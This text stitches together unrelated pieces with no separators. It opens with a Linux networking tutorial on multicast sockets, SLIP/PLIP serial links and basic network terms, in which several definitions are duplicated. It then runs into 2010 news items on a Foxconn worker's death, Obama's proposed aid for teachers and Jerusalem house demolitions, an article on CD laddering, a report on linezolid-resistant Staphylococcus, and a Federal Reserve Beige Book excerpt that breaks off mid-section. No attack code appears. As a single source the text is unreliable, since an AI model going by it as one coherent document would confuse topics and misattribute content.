An HTTP request to a web server ( TCP / IP ) , email SNMP ( TCP / IP ) , DNS ( UDP ) , FTP ( TCP / IP ) , ... are all peer to peer unicast transactions .
If one wants to transmit a video , audio or data stream to multiple nodes with one transmission stream instead of multiple individual peer to peer connections , one for each node , one may use multicasting to reduce network load .
Note that multicast and a network broadcast are different and that multicast is a UDP broadcast only .
Multicast messages are only " heard " by the nodes on the network that have " joined the multicast group " which are those that are interested in the information .
The Linux kernel is Level - 2 Multicast - Compliant .
It meets all requirements to send , receive and act as a router for multicast datagrams .
For a process to receive multicast datagrams it has to request the kernel to join the multicast group and bind the port receiving the datagrams .
When a process is no longer interested in the multicast group , a request is made to the kernel to leave the group .
It is the kernel / host which joins the multicast group and not the process .
Kernel configuration requires " CONFIG_IP_MULTICAST=y " .
In order for the Linux kernel to support multicast routing , set the following in the kernel config :
CONFIG_IP_MULTICAST=y
CONFIG_IP_ROUTER=y
CONFIG_IP_MROUTE=y
CONFIG_NET_IPIP=y
The default Red Hat / Fedora kernels are compiled to support multicast .
See the YoLinux tutorial on optimization and rebuilding the Linux kernel .
Note that on multihomed systems ( more than one IP address / network card ) , only one device can be configured to handle multicast .
Class D networks with a range of IP addresses from 224.0.0.0 to 239.255.255.255 ( See Network Classes above ) have typically been reserved for multicast .
Useful commands :
Command Description cat / proc / net / igmp
List multicast group to which the host is subscribed .
Use " Internet Group Management Protocol " .
( See /usr / src/ linux / net / core / igmp.c ) cat / proc / net / dev_mcast List multicast interfaces .
( See /usr / src/ linux / net/core / dev_mcast.c ) ping 224.0.0.1
All hosts configured for multicast will respond with their IP addresses ping 224.0.0.2
All routers configured for multicast will respond ping 224.0.0.3
All PIM routers configured for multicast will respond ping 224.0.0.4
All DVMRP routers configured for multicast will respond ping 224.0.0.5
All OSPF routers configured for multicast will respond
Multicast Application Programming :
Multicast transmissions are achieved through proper routing , router configuration ( if communicating through subnets ) and programatically with the use of the following " C " function library calls :
Function Call Description setsockopt ( int sockfd , int level , int optname , const void * optval , socklen_t optlen )
Pass information to the Kernel.
getsockopt ( int sockfd , int level , int optname , void * optval , socklen_t * optlen ) Retrieve information broadcast using multicast .
optname
Option Value Description IP_MULTICAST_IF
32 Specify ethernet interface to use : struct in_addr interface_addr ;
setsockopt ( socket , IPPROTO_IP , IP_MULTICAST_IF , &interface_addr , sizeof ( interface_addr ) ) ; Can use setsockopt ( ) with option INADDR_ANY to reset the configuration .
IP_MULTICAST_TTL 33 Time To Live ( TTL ) value sets how many router hops are allowed .
Restrict to local network : u_char ttl = 1 ;
setsockopt ( socket , IPPROTO_IP , IP_MULTICAST_TTL , &ttl , sizeof ( ttl ) ) ; Values of ttl are 0 to 255 IP_MULTICAST_LOOP 34 Data sent is looped back to the same host .
Enable :
uchar loop = 1
setsockopt ( socket , IPPROTO_IP , IP_MULTICAST_LOOP , &loop , sizeof ( loop ) ) ; where loop=0 to disable loopback IP_ADD_MEMBERSHIP 35 Specify multicast group .
Include file linux / in.h set struct ip_mreq ip_mreq.imr_multiaddr : IP multicast address
ip_mreq.imr_interface : local IP interface address ( can be INADDR_ANY ) setsockopt ( socket , IPPROTO_IP , IP_ADD_MEMBERSHIP , &mreq , sizeof ( mreq ) ) ;
Add as many groups as needed .
IP_DROP_MEMBERSHIP
36 Closing the socket will drop membership or : struct ip_mreq mreq ; setsockopt ( socket , IPPROTO_IP , IP_DROP_MEMBERSHIP , &mreq , sizeof ( mreq ) ) ; IP_UNBLOCK_SOURCE
37 Unblock a previously blocked source for a given multicast group .
IP_BLOCK_SOURCE 38 Block IP v4 multicast packets that have a source address that matches the given IP v4 source address .
IP_ADD_SOURCE_MEMBERSHIP
39 Join IP v4 multicast group on an IP v4 interface and specify the IP v4 source - filter address .
Set these values by using the SETSOCKOPT API .
IP_DROP_SOURCE_MEMBERSHIP
40 Drop multicast group .
IP_MSFILTER 41
MCAST_JOIN_GROUP
42 Join a multicast group and set the IP v4 or IP v6 multicast address and the local interface .
MCAST_BLOCK_SOURCE 43
MCAST_UNBLOCK_SOURCE
44
MCAST_LEAVE_GROUP
45 Leave a multicast group .
MCAST_JOIN_SOURCE_GROUP
46
MCAST_LEAVE_SOURCE_GROUP
47
MCAST_MSFILTER 48
IP_MULTICAST_ALL 49
Whereis :
For more on multicast programming see : Multicast Howto
The multicast application will specify the multicast group , loopback interface , TTL ( network time to live or router hops ) , network interface and the multicast group to add or drop .
/ sbin / ifconfig eth0 multicast
route -n add - net 224.0.0.0 netmask 240.0.0.0 dev eth0
/ sbin / ip route show ( show the route you just created )
Add route to support multicast : Note that if adding a route to forward packets through a router , that the router MUST be configured to forward multicast packets .
Many routers do not support forwarding of multicast packets or have a default configuration which does not .
The internet by default does not forward multicast packets .
Multicast Packet Forwarding and Routing :
Linux can be configured to forward packets and act as a simple router between two networks .
The prior section on " Enable Forwarding " shows how Linux can be configured to forward regular TCP and UDP packets .
This does not include multicast packets .
Multicasting begins with an application requesting multicast group membership .
It is this request that tells a muliticast router to enable forwarding on the interface that the request arrived on -- no request , no routing .
The request must be processed by a multicasting router .
Multicast packets can be forwarded and routed by running multicast routing software on the system .
Routing software Protocols Description Xorp PIM
Routing of IPv4 and IPv6 network protocols including UDP multicast SmcRoute PIM Simple static routing of UDP multicast mrouted DVMRP DVMRP ( Distance Vector Multicast Protocol ) is a depricated protocol thus making this software obsolete .
pimd PIM
PIM-SM : PIM Sparse Mode
PIM -DM : PIM Dense Mode Supports PIM ( Protocol Independent Multicast ) routing protocol .
Quagga PIM
BGP -4
RIP
OSPFv2i , etc Quagga ( a fork of Zebra ) is a routing application supporting a full range of routing protocols .
Serial Line IP :
Linux can support Internet Protocol ( IP ) protocol over serial device interfaces .
Over long distances this is typically supported using a modem over telephone lines ( POTS : Plain Old Telephone Service ) or satellite communications .
PPP : Point - to - Point Protocol
This is the most common form of IP over serial line and is the most common technique used by telephone dial - up ISPs .
The following tutorials use a Hayes command set compatible modem .
SLIP : Serial Line IP ( older than PPP and less capable )
PPTP : Point - to - Point Tunneling Protocol
Devices :
Interfaces Description sl0 sl1 sl2 sl3 SLIP interfaces .
Linux kernel supports up to four .
COM1 COM2 COM3 COM4 Serial Ports ( RS - 232 hardware ) /dev/ttyS0 /dev/ttyS1 /dev/ttyS2 /dev/ttyS3
Serial devices ( dial in )
( virtual terminal consoles ) / dev/cua0 / dev/cua1 / dev/ cua2 / dev/cua3
Serial devices ( dial out ) 4 4 4 4 Interface major numbers ( dial in ) 5 5 5 5 Interface major numbers ( dial out ) 64 65 66 67 Interface minor numbers
ls -l /dev/ttyS* / dev/cua *
The commandwill show the device major and minor numbers .
mknod -m 666 /dev/cua1 c 5 65
chown root.uucp /dev/cua1
Configure /etc/resolv.conf
( See notes above in this tutorial )
( See notes above in this tutorial ) Attach network interface to serial line on COM2 : /sbin/ slattach -p slip -s 19200 / dev/ttyS1 &
Assign local and remote IP : /sbin/ifconfig sl0 192.168.1.10 pointopoint 192.168.1.40 up
Assign local IP ( 192.168.1.10 ) and connect to remote server ( 192.168.1.40 )
Alternate example : /sbin/route add plip1 192.168.1.10 pointopoint 192.168.1.40
Assign local IP ( 192.168.1.10 ) and connect to remote server ( 192.168.1.40 )
Alternate example :
Add route : / sbin / route add default dev sl0 &
The major and minor numbers are used when creating a SPLIP interface : Example : SLIP configuration : Also see Dialup IP ( DIP )
PLIP : Parallel Line IP
Point to point serial links ( rather than broadcast networks line ethernet ) , can also be supported over parallel printer ports .
drivers / net / Space.c
Interface I/O Port IRQ plip0 0x3BC 7 plip1 0x378 7 plip2 0x278 5
ifconfig plip1 192.168.1.10 pointopoint 192.168.1.40
connect host 192.168.1.10 to remote host 192.168.1.40
connect host 192.168.1.10 to remote host 192.168.1.40 route add default gw 192.168.1.40
Specify remote host as the gateway .
ifconfig plip1 192.168.1.40 pointopoint 192.168.1.10
route add 192.168.1.10 gw 192.168.1.40
Serial port related man pages :
setserial - get / set Linux serial port information
Typical configuration : Interrupt detection : /sbin/setserial - W / dev/cua* Configuration : / sbin / setserial / dev/cua1 auto_irq skip_test autoconfig
or / sbin / setserial / dev/cua1 auto_irq skip_test autoconfig uart 16550 Display Configuration : / sbin/ setserial - bg / dev/cua *
Enable hardware handshake : stty crtscts < /dev/cua1
( verify : stty -s < / dev/cua1 )
Typical configuration : stty - change and print terminal line settings
tty - print the file name of the terminal connected to standard input
pppd - Point - to - Point Protocol Daemon
slattach - attach a network interface to a serial line
mknod - make block or character special files
An IP network at 10 to 20 kBps over parallel printer ports lp0 or lp1 are much faster than serial .
Linux supports mode 0 PLIP transferring half bytes of data at a time .
Requires " NULL Printer " or " Turbo Laplink " printer connection .
See kernel sourcePLIP Configuration :
On the remote host at the other end of the cable , the opposite must be specified :
Living in a MS / Windows World :
SMB4k : My favorite MS / Windows file share browser .
In Nautilus use the URL " smb : " to view MS / Windows servers .
[ tutorial ]
See the YoLinux tutorial on integrating Linux into a Microsoft network .
Network Definitions :
IPv4 : Most of the Internet servers and personal computers use Internet Protocol version 4 ( IPv4 ) .
This uses 32 bits to assign a network address as defined by the four octets of an IP address up to 255.255.255.255 .
Which is the representation of four 8 bit numbers thus totaling 32 bits .
Most of the Internet servers and personal computers use Internet Protocol version 4 ( IPv4 ) .
This uses 32 bits to assign a network address as defined by the four octets of an IP address up to 255.255.255.255 .
Which is the representation of four 8 bit numbers thus totaling 32 bits .
IPv6 : Internet Protocol version 6 ( IPv6 ) uses a 128 bit address and thus billions and billions of potential addresses .
The protocol has also been upgraded to include new quality of service features and security .
Currently Linux supports IPv6 but IP v4 is used when connecting your computer to the internet .
Internet Protocol version 6 ( IPv6 ) uses a 128 bit address and thus billions and billions of potential addresses .
The protocol has also been upgraded to include new quality of service features and security .
Currently Linux supports IPv6 but IP v4 is used when connecting your computer to the internet .
TCP / IP : ( Transmission Control Protocol / Internet Protocol ) uses a client - server model for communications .
The protocol defines the data packets transmitted ( packet header , data section ) , data integrity verification ( error detection bytes ) , connection and acknowledgement protocol , and re-transmission .
( Transmission Control Protocol / Internet Protocol ) uses a client - server model for communications .
The protocol defines the data packets transmitted ( packet header , data section ) , data integrity verification ( error detection bytes ) , connection and acknowledgement protocol , and re-transmission .
TCP / IP time to live ( TTL ) :
This is a counting mechanism to determine how long a packet is valid before it reaches its destination .
Each time a TCP / IP packet passes through a router it will decrement its TTL count .
When the count reaches zero the packet is dropped by the router .
This ensures that errant routing and looping aimless packets will not flood the network .
This is a counting mechanism to determine how long a packet is valid before it reaches its destination .
Each time a TCP / IP packet passes through a router it will decrement its TTL count .
When the count reaches zero the packet is dropped by the router .
This ensures that errant routing and looping aimless packets will not flood the network .
MAC Address : ( media access control ) is the network card address used for communication between other network devices on the subnet .
This info is not routable .
The ARP table maps TCP / IP address ( global internet ) to the local hardware on the local network .
Use the command / sbin / ifconfig to view both the IP address and the MAC address .
The MAC address uniquely identifies each node of a network and is used by the Ethernet protocol .
( media access control ) is the network card address used for communication between other network devices on the subnet .
This info is not routable .
The ARP table maps TCP / IP address ( global internet ) to the local hardware on the local network .
Use the command to view both the IP address and the MAC address .
The MAC address uniquely identifies each node of a network and is used by the Ethernet protocol .
Full Duplex : Allows the simultaneous sending and receiving of packets .
Most modern modems support full duplex .
Allows the simultaneous sending and receiving of packets .
Most modern modems support full duplex .
Half Duplex : Allows the sending and receiving of packets in one direction at a time only .
Allows the sending and receiving of packets in one direction at a time only .
OSI 7 Layer Model : The ISO ( International Standards Organization ) has defined the OSI ( Open Systems Interconnection ) model for current networking protocols .
OSI Layer Description Linux Networking Use 7 Application Layer .
The top layer for communications applications like email and the web .
telnet , web browser , sendmail 6 Presentation Layer .
Syntax and format of data transfer .
SMTP , http 5 Session Layer .
4 Transport Layer .
Connection , acknowledgement and data packet transmission .
TCP
UDP 3 Network Layer .
IP
ARP 2 Data Link Layer .
Error control , timing Ethernet 1 Physical Layer .
Electrical characteristics of signal and NIC Ethernet
The ISO ( International Standards Organization ) has defined the OSI ( Open Systems Interconnection ) model for current networking protocols .
Network Hub : Hardware to connect network devices together .
The devices will all be on the same network and / or subnet .
All network traffic is shared and can be sniffed by any other node connected to the same hub .
Hardware to connect network devices together .
The devices will all be on the same network and / or subnet .
All network traffic is shared and can be sniffed by any other node connected to the same hub .
Network Switch : Like a hub but creates a private link between any two connected nodes when a network connection is established .
This reduces the amount of network collisions and thus improves speed .
Broadcast messages are still sent to all nodes .
Related Links :
Test Internet Bandwidth :
More Networking Man Pages :
icmp - Linux IPv4 ICMP kernel module
usernetctl - allow a user to manipulate a network interface if permitted
SNMP : Simple Network Management Protocol ( query / configure network devices )
( RH / CentOS packages net - snmp and net - snmp - utils ) snmpd - daemon to respond to SNMP request packets
/etc/snmp / snmp.conf - configuration file for Net - SNMP applications snmpconf - creates and modifies SNMP configuration files snmpstatus - retrieves a fixed set of management information from a network entity snmptrap - sends an SNMP notification to a manager snmpnetstat - display networking status and configuration information from a network entity via SNMP snmptest - communicates with a network entity using SNMP requests snmpcmd - options and behaviour common to most of the Net - SNMP commandline tools
snmpcmd [ OPTIONS ] AGENT [ PARAMETERS ] snmpset - communicates with a network entity using SNMP SET requests
snmpset [ COMMON OPTIONS ] OID TYPE VALUE [ OID TYPE VALUE ] ... snmpget - communicates with a network entity using SNMP GET requests
snmpget [ COMMON OPTIONS ] [ - Cf ] OID [ OID ] ... variables - Format of specifying variable names to SNMP tools
( RH / CentOS packages net - snmp and net - snmp - utils )
Books :
Books :
" Networking Linux : A Practical Guide to TCP / IP "
by Pat Eyler
ISBN # 0735710317 , New Riders Publishing
" LINUX TCP / IP Network Administration
by Scott Mann , Mitchell Krell
ISBN # 0130322202 , rentice Hall PTR
" Advanced Linux Networking "
by Roderick W. Smith
ISBN # 0201774232 , Addison - Wesley Professional ; 1st edition ( July 15 , 2002 )
" Linux Routing "
by Dee Ann LeBlanc , Joe " Zonker " Brockmeier , Ronald W. McCarty Jr.
ISBN # 1578702674 , Sams ; 1st edition ( October 11 , 2001 )
" Policy Routing Using Linux "
by Matthew G. Marsh
ISBN # 0672320525 , Sams ; ( March 6 , 2001 )
" Ubuntu Unleashed 2017 edition : "
Covering 16.10 and 17.04 , 17.10 ( 12th Edition )
by Matthew Helmke , Andrew Hudson and Paul Hudson
Sams Publishing , ISBN # 0134511182
" Ubuntu Unleashed 2013 edition : "
Covering 12.10 and 13.04 ( 8th Edition )
by Matthew Helmke , Andrew Hudson and Paul Hudson
Sams Publishing , ISBN # 0672336243
( Dec 15 , 2012 )
" Ubuntu Unleashed 2012 edition : "
Covering 11.10 and 12.04 ( 7th Edition )
by Matthew Helmke , Andrew Hudson and Paul Hudson
Sams Publishing , ISBN # 0672335786
( Jan 16 , 2012 )
" Red Hat Enterprise Linux 7 : Desktops and Administration "
by Richard Petersen
Surfing Turtle Press , ISBN # 1936280620
( Jan 13 , 2017 )
" Fedora 18 Desktop Handbook "
by Richard Petersen
Surfing Turtle Press , ISBN # 1936280639
( Mar 6 , 2013 )
" Fedora 18 Networking and Servers "
by Richard Petersen
Surfing Turtle Press , ISBN # 1936280698
( March 29 , 2013 )
" Fedora 14 Desktop Handbook "
by Richard Petersen
Surfing Turtle Press , ISBN # 1936280167
( Nov 30 , 2010 )
" Fedora 14 Administration and Security "
by Richard Petersen
Surfing Turtle Press , ISBN # 1936280221
( Jan 6 , 2011 )
" Fedora 14 Networking and Servers "
by Richard Petersen
Surfing Turtle Press , ISBN # 1936280191
( Dec 26 , 2010 )
" Practical Guide to Ubuntu Linux ( Versions 8.10 and 8.04 ) "
by Mark Sobell
Prentice Hall PTR , ISBN # 0137003889
2 edition ( January 9 , 2009 )
" Fedora 10 and Red Hat Enterprise Linux Bible "
by Christopher Negus
Wiley , ISBN # 0470413395
" Red Hat Fedora 6 and Enterprise Linux Bible "
by Christopher Negus
Sams , ISBN # 047008278X
" Fedora 7 & Red Hat Enterprise Linux : The Complete Reference "
by Richard Petersen
Sams , ISBN # 0071486429
" Red Hat Fedora Core 6 Unleashed "
by Paul Hudson , Andrew Hudson
Sams , ISBN # 0672329298
Another Foxconn employee has died .
However , it was not by suicide .
A 28 - year - old man , who married his wife ( pictured ) three months ago , died from exhaustion in Shenzhen in his rental house after working a 34 - hour shift his family claims .
No official statement has been issued regarding the man 's death .
Advertisement
Yan Li was apparently suffering from shortness of breath .
This year eleven Foxconn employees have jumped to their death at the company 's Shenzhen factory .
Foxconn has recently raised factory worker wages to the equivalent of US $ 160 a month .
Advertisement
Foxconn manufactures the Apple iPod , iPhone and the iPad as well the Xbox 360 , the PS3 and the Wii. Sony and Nintendo are investigating the issue .
Apple honcho Steven Jobs has called the suicides " troubling " , but has asserted that Foxconn " is not a sweatshop " .
Sony Investigating Factory Suicides Chinese manufacturing giant Foxconn has been in the news for all the wrong reasons lately , a spate …
Read more
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
[ Mingpao via NowNews via MIC Gadget via Gizmodo ]
Investing in a certificate of deposit might be right for you if you ’re risk - averse — it ’s a safe way to grow your money if you ’re willing to leave it in the bank until it matures .
Keep in mind , however , that the safer the investment is , the lower its return will be .
But there ’s another option .
Enter the CD ladder , a way to make the most of CDs and earn a higher overall return on your savings .
CD laddering involves investing in a series of CDs and setting each one to mature at a different time , which gives you periodic access to some of your money while the rest of it keeps earning interest , giving you the option to keep the money or roll it into another CD and extending the ladder .
Find out what a CD ladder is and how you can maximize your earnings with one .
Decide if this strategy works for your financial plan and then do your homework to find the best CD accounts .
What Is a CD Ladder ?
Creating a CD ladder is an effective way to invest your money at a higher rate without compromising your funds ’ safety .
When you create a CD ladder , you should take into account the following factors :
More from Your Money
CD maturity dates
CD interest rates
The amount you want to invest in your CDs
Your CDs ’ maturity dates determine when you ’ll have access to your money .
For example , say you put your money in five CDs .
The first CD expires in one year , the second in two years and so on .
When the one - year CD matures , you can roll it into the longest - term CD — and you can continue doing that with each account that has reached its maturity .
In addition to picking your CD maturity dates , you ’ll obviously want to choose CDs with the highest interest rates .
In general , long - term CDs offer a higher interest rate than short - term CDs .
The amount you want to invest determines how much money you ’ll put in each CD in your ladder .
So , if you have $ 25,000 to invest in a CD ladder , you can invest $ 5,000 in five different CDs .
Related : Find Higher CD Interest Rates Now
How to Ladder CDs
Building a CD ladder is straightforward .
Follow this CD ladder example that illustrates a $ 25,000 investment for a five - year ladder :
More from Your Money
Open five CDs with $ 5,000 each — and make sure the accounts ’ ascending maturities are 12 months apart .
This way , you ’ll have access to some of your money every 12 months as your CDs come to term — and you ’ll have the interest - earning power of the longer - term CDs .
When your 12 - month month CD matures , you can take your money out or renew the CD to keep your ladder going .
Once all the original CDs have been renewed , the ladder works automatically .
Learn : 6 Tips for Choosing a CD Account
CD Laddering Pros and Cons
There are n’t really any cons to building a CD ladder .
By using this laddering technique , you are avoiding the two downsides usually associated with CDs : the interest rate risk and their low liquidity .
“ The trick to [ creating a CD ladder ] effectively is to pick the right spacing of the rungs and the right overall length of the ladder for your particular situation , taking into account the interest rate environment at the time you ’re building the ladder , ” said Scott Halliwell , a USAA Certified Financial Planner .
“ It ’s also important not to extend the ladder too far out so that you miss out too much if interest rates start to increase while the ladder ’s in place . ”
More from Your Money
CD laddering offers several advantages that make the strategy appealing to investors .
Consider these perks :
CDs have higher rates of return than savings accounts .
Not all of your money is invested at the same low rate if you ladder your CDs .
Long - time laddered investments have higher yields than shorter ones .
You can set up some short - term CDs to gain more frequent access to your money in case you need cash in hand .
If you invest during an economic slump , you can get higher interest rates as the economy improves .
The last point is important : Although interest rates on deposit accounts — including CDs and high yield savings accounts — are currently low , those interest rates might go up soon .
If one CD matures during a time when your bank is increasing interest rates , you can put your earnings from that CD into a new CD with the highest interest rate .
Related : Things to Know About High - Yield CDs
Considerations for Your CD Ladder Strategy
When it comes to building a CD ladder , keep it simple .
Here are some tips that might help you build yours :
More from Your Money
Write down what you want to do with your savings and when you ’ll need access to the money ; your access needs will determine how many CDs you buy and how long their terms should be .
Invest in your ladder CDs with the same bank , because it will be easier to keep them organized if they ’re in one place and tied to one savings account .
If you ’re planning on laddering , choose maturities that are one , two or even five years out .
Any earlier maturity dates will require you to purchase a new CD every three to six months to keep your ladder in place .
CD Laddering Is a Smart Move
As you now know , CD laddering can help you earn greater returns on your CD investments and enable you to access some of your money periodically , which makes this a win - win financial strategy .
Taking full advantage of your CD investment options — including laddering strategies — will likely enhance your returns over time , so if you want to make your cash work harder for you , consider adding this technique to your financial playbook .
Up Next : Here Are the Highest CD Rates in Every State
With a relative drop in the bailout bucket , the president thinks he can save 300,000 teachers who would otherwise be kept by economic calamity from annoying America ’s children .
The money would go to state and local governments struggling to make ends meet .
Christian Science Monitor :
Mr. Obama has intimated in the past that the federal government ’s job of propping up the economy was not yet done .
Last week , he sent a letter to Congress supporting efforts to pass two separate measures totaling as much as $ 50 billion in aid for states and cities .
With states still facing large budget shortfalls , Obama wants to minimize the potential loss of teachers , law - enforcement officers , and firefighters .
He estimates that as many as 300,000 teachers could be laid off .
In this way , the money would largely pick up with the $ 787 billion federal stimulus bill left off .
Read more
JERUSALEM ( AP ) — Jerusalem ’s mayor pressed ahead Monday with a plan to raze 22 Palestinian houses in east Jerusalem to make room for an Israeli tourist center , a decision that could stir new tensions in the divided city and put Israel in conflict with the Obama administration .
In March , Prime Minister Benjamin Netanyahu pressured Jerusalem Mayor Nir Barkat to hold up the plan so authorities could consult with Palestinians who would lose their homes — a delay that appeared to be aimed at fending off criticism from the United States .
“ Now , after fine - tuning the plan and seeking more cooperation with the residents as far as their needs and improving the quality of their lives , the municipality is ready to submit the plans for the first stage of approval , ” Mr. Barkat ’s spokesman , Stephan Miller .
Mr. Barkat , who opposes sharing Jerusalem with the Palestinians , asked the municipal planning committee to give preliminary approval to the plan .
However , final approval , which would require an Interior Ministry green light , could take many months .
Jerusalem is the most divisive issue between Israelis and Palestinians .
Israel annexed east Jerusalem after capturing it from Jordan in the 1967 Mideast war , and nearly 200,000 Jews have moved there since , living alongside 250,000 Palestinians in an uneasy coexistence .
Palestinians hope to build the capital of a future state in east Jerusalem and see any Israeli construction there as undercutting their claims to the land .
The international community does not recognize Israeli sovereignty over east Jerusalem , and the United States wants Israel to freeze all Jewish settlement in Palestinian areas , including east Jerusalem , to facilitate Mideast peace talks .
It also recently demanded that Israel lift its 3 - year - old blockade of the 1.5 million Palestinians in Gaza .
Israel strained relations with the United States in March when it announced plans for additional construction in east Jerusalem as Vice President Joseph R. Biden Jr. was preparing to have dinner with Mr. Netanyahu .
The plan calls for the construction of shops , restaurants , art galleries and a large community center on the site where some say the biblical King David wrote his psalms .
The 22 displaced families would be allowed to build homes elsewhere in the neighborhood , though it is not clear who would pay for them .
Activists who want to block all demolitions issued a statement saying the plan “ comes in the general context of ( the ) fast - track Judaization ” of east Jerusalem .
It pre-empts “ the possibility of Jerusalem ever being a shared city , or indeed capital of a Palestinian state , ” the statement said .
“ This in itself precludes peace . ”
The U.S. Embassy in Israel had no comment .
The prime minister ’s office said Mr. Netanyahu “ hopes that since this project is only in a preliminary stage , that the dialogue can continue with those who have built homes on public land and it will be possible to find an agreed solution in accordance with the law . ”
Mr. Barkat agreed in March to Mr. Netanyahu ’s request for delay to consult Palestinian residents before breaking ground .
Israeli demolition of Palestinian homes has in the past provoked harsh reaction from the United States , and no houses have been razed since October .
Although Israel claims it simply is enforcing the law by knocking down illegally built structures , many of the unauthorized homes have gone up because Palestinians have a hard time obtaining construction permits in east Jerusalem .
Mr. Barkat says the plan gives a much - needed facelift to Jerusalem ’s decaying al - Bustan neighborhood , which Israel calls Gan Hamelech , or the King ’s Garden .
The contested site is a section of a larger neighborhood called Silwan , which is home to some 50,000 Palestinians and 70 Jewish families .
Demolitions elsewhere in Silwan have made the neighborhood a hub of tension between Palestinians and Jews .
Sign up for Daily Newsletters Manage Newsletters
Copyright © 2020 The Washington Times , LLC .
June 8 , 2010 --
First there were methicillin - resistant Staphylococcus aureus ( MRSA ) infections .
Now there is linezolid - resistant Staphylococcus aureus ( LRSA ) , according to new research in the June 9 issue of the Journal of the American Medical Association .
A relatively new antibiotic , linezolid is considered one of the few effective ways to treat severe MRSA infections , which tend to strike the bloodstream or respiratory tracts of critically ill people in hospitals .
“ The main consequence is the risk of losing a very effective and relatively safe drug for the treatment of severe MRSA infection , ” study author Miguel Sanchez Garcia , MD , PhD , of the Hospital Clinico San Carlos and Universidad Complutense in Madrid , Spain , says in an email .
Antibiotic resistance , which has been called one of the three greatest threats to human health by the World Health Organization , occurs when bacteria wise up to the presence of an antibiotic and morph into superbugs that can survive and thrive in its presence .
The more you use an antibiotic and expose certain organisms to it , the more likely there will be resistance to it .
Garcia and colleagues identified 12 people who developed LRSA infections between April 13 and June 26 , 2008 , in the intensive care unit of a Madrid - based hospital .
The study also showed that linezolid was used extensively in the hospital before the outbreak , which likely played a key role in the development of the resistant strains .
As a result , use of linezolid decreased dramatically by July 2008 and no cases have been seen since , the study shows .
LRSA caused ventilator - associated pneumonia in six of the 12 patients and a blood infection in three .
The main risk factor for LRSA infection was prior use of linezolid .
Six patients died , but only one of these deaths was attributed to LRSA infection , the researchers say .
“ In our 12 - patient experience , the clinical presentation of the infections was of mild to moderate severity , although they occurred in very debilitated patients , ” Garcia says .
“ In this critically ill population of patients , MRSA infections generally seem to be associated with a more severe clinical course , although it ’s too early to say anything definitive about this issue . ”
Prepared at the Federal Reserve Bank of Chicago and based on information collected on or before May 28 , 2010 .
This document summarizes comments received from business and other contacts outside the Federal Reserve and is not a commentary on the views of Federal Reserve officials .
Economic activity continued to improve since the last report across all twelve Federal Reserve Districts , although many Districts described the pace of growth as " modest . "
Consumer spending and tourism activity generally increased .
Business spending also rose , on net , with employment and capital spending edging up but inventory investment slowing .
By sector , nonfinancial services , manufacturing , and transportation continued to gradually improve .
Residential real estate activity in many Districts was buoyed by the April deadline for the homebuyer tax credit .
Commercial real estate remained weak , although some Districts reported an increase in leasing .
Financial activity was little changed on balance , although a few Districts noted a modest increase in lending .
Spring planting was generally ahead of the normal pace , while conditions in the natural resource sectors varied across the Districts .
Prices of final goods and services were largely stable as higher input costs were not being passed along to customers and wage pressures continued to be minimal .
Consumer Spending and Tourism
Consumer spending improved from the previous report .
Spending continued to be concentrated in necessities as opposed to discretionary big - ticket items .
Retail sales increased in April and May , although several Districts noted that the gains were uneven across months .
Sales of spring and summer apparel were strong in the Boston , New York , Philadelphia , St. Louis , Kansas City , and Dallas Districts .
Sales of home improvement and lawn and garden equipment were reported to have strengthened in the Richmond , Chicago , and San Francisco Districts .
Modest improvement in sales of discretionary home goods was noted by Cleveland , Kansas City , and San Francisco .
Vehicle sales also rose , but the rate of increase reportedly slowed in May in the New York , Cleveland , and San Francisco Districts .
Tourism activity improved .
Dallas reported a continued increase in leisure air travel .
Hotel occupancy rates rose in the New York , Atlanta , Chicago , Kansas City , and San Francisco Districts , and convention activity increased in Atlanta and San Francisco .
Richmond reported resort bookings for the Memorial Day holiday weekend were stronger than last year , and Atlanta indicated cruise - line bookings were up slightly .
Atlanta also reported , however , that the Gulf oil spill and Tennessee floods had already resulted in some vacation lodging cancellations .
The potential exists for a much greater impact , although contacts are quite uncertain as to the ultimate effects .
Business Spending
Business spending increased moderately from the previous report .
Cleveland , Chicago and Dallas noted that growth in manufacturers ' inventories was leveling off , while Boston , Atlanta , and St. Louis reported the same for retailers ' inventories .
In contrast , several Districts reported that auto production was failing to keep up with demand , pressuring already lean auto dealer stocks .
Capital spending was slightly higher in a number of Districts , although several indicated that continuing caution on the part of firms and tight credit availability were limiting expenditures .
The manufacturing , transportation , and energy industries accounted for most of the increase in spending on plant and equipment .
Boston reported that spending on information technology services increased .
Nonfinancial Services
Nonfinancial service activity was slightly improved , on balance , from the previous report .
Several Districts highlighted some strength in demand for professional technical services , such as software and information technology , engineering , and other scientific trades .
In contrast , sluggishness remained in accounting , legal , marketing , media , and construction services .
Demand for business support services was more mixed .
Philadelphia and Chicago reported slightly higher demand while Boston and St. Louis noted that demand remained weak .
St. Louis also indicated that budget cuts had led to reduced government and education services .
Manufacturing and Transportation
Manufacturing and transportation activity continued to gradually improve across all twelve Districts .
Most Districts reported further increases in factory production , shipments , and new orders , although Philadelphia and Chicago noted that the pace of gains had slowed in May .
Steel producers and metals manufacturers reported moderately higher production in Cleveland , Chicago , St. Louis , and Dallas , although Chicago indicated capacity utilization leveled off in May .
Auto and parts production increased in the Cleveland , Richmond , and Chicago Districts .
Oil refinery capacity utilization was up in the Dallas District .
Higher residential construction increased demand for construction equipment and materials in the Philadelphia , Richmond , Chicago , Dallas , and San Francisco Districts .
Chicago also noted that demand from Asia and South America for heavy equipment continued to be robust .
The output of medical equipment and pharmaceuticals remained strong in Boston and Chicago , as did high - tech manufacturing in Boston , St. Louis , Kansas City , and San Francisco .
Food processing increased in Dallas and San Francisco .
Trucking and rail activity increased , with freight traffic and raw material shipments on the rise in Cleveland , Atlanta , and Dallas .
Real Estate and Construction
Residential real estate activity improved since the last report .
Most Districts noted an increase in home sales and construction prior to the April 30th deadline for the homebuyer tax credit , with contacts in many of these Districts also indicating a corresponding slowing in activity in May .
Tight credit , the elevated inventory of homes available for sale , and the " shadow inventory " of foreclosed properties on banks ' balance sheets held back residential development in the New York , Cleveland , Atlanta , and Chicago Districts .
Commercial real estate activity generally remained weak .
Office , industrial , and retail vacancy rates continued to drift upward in many Districts putting downward pressure on rents .
However , lower rents were said to have led to an increase in leasing activity in New York , Philadelphia , Richmond , Kansas City , Dallas , and San Francisco .
The elevated inventory of existing properties for sale or rent continued to weigh on new private nonresidential construction .
However , stronger industrial demand was noted in several Districts .
Public construction increased in Philadelphia , Cleveland , and Chicago , but slowed in Minneapolis .
Banking and Finance
Financial activity was little changed on balance from the previous report .
